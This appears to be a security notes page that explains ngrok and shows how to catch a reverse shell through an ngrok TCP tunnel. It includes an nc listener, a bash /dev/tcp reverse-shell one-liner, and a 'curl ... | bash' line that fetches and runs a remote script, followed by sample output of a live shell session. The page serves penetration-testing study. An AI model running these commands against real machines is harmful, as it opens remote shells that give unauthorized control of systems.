LinkedInGitHubYouTube

ngrok

Ngrok overview and setting up reverse shells

Overview

  • ngrok is a pretty sweet solution for a secure ingress gateway for your apps, services, and APIs. Check the docs to see its use cases

  • With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL

  • There are methods to build authentication or allowlisting around this but they're not part of the free tier

Registration

  • After signing up for a free ngrok account, follow the setup instructions to get ngrok set up on your machine

Example - Reverse Shell

Ngrok and local listener setup

  • On your machine run a command to capture TCP traffic 

ngrok tcp 1337

  • This will provide you with a free forwarding address (you can also set up a custom domain)

ngrok                                                                                                                
                                                                                                                                     
Policy Management Examples http://ngrok.com/apigwexamples                                                                            
                                                                                                                                     
Session Status                online                                                                                                 
Account                       cal (Plan: Free)                                                                                       
Version                       3.18.2                                                                                                 
Region                        United States (California) (us-cal-1)                                                                  
Web Interface                 http://127.0.0.1:4040                                                                                  
Forwarding                    tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337                                                  
                                                                                                                                     
Connections                   ttl     opn     rt1     rt5     p50     p90                                                            
                              0       0       0.00    0.00    0.00    0.00

  • You will need a way to catch incoming connections, we can use nc for this like so:

nc -nvlp 1337

Reverse shell setup and execution

  • On a different machine, execute a reverse shell and the traffic should be sent to your machine

  • Check out pentestmonkey and revshells for additional reverse shell options

bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'

  • Tip - If you're running a bash reverse shell, ensure the current shell is bash, or you'll get an error like the one below. Otherwise, you can specifically call on bash using the command above from any shell so long as bash is installed

zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412

  • Another option is to use reverse-shell.sh which acts as a reverse shell as a service

  • You can go to this URL directly in your browser and see the script that would execute

curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash

  • Once the shell has successfully executed, you should see it in your listener e.g., nc

nc -nvlp 1337

listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

bash-3.2$ whoami
tyler

bash-3.2$ hostname
TylerMBP.local

bash-3.2$
PreviousjqNextPython

Last updated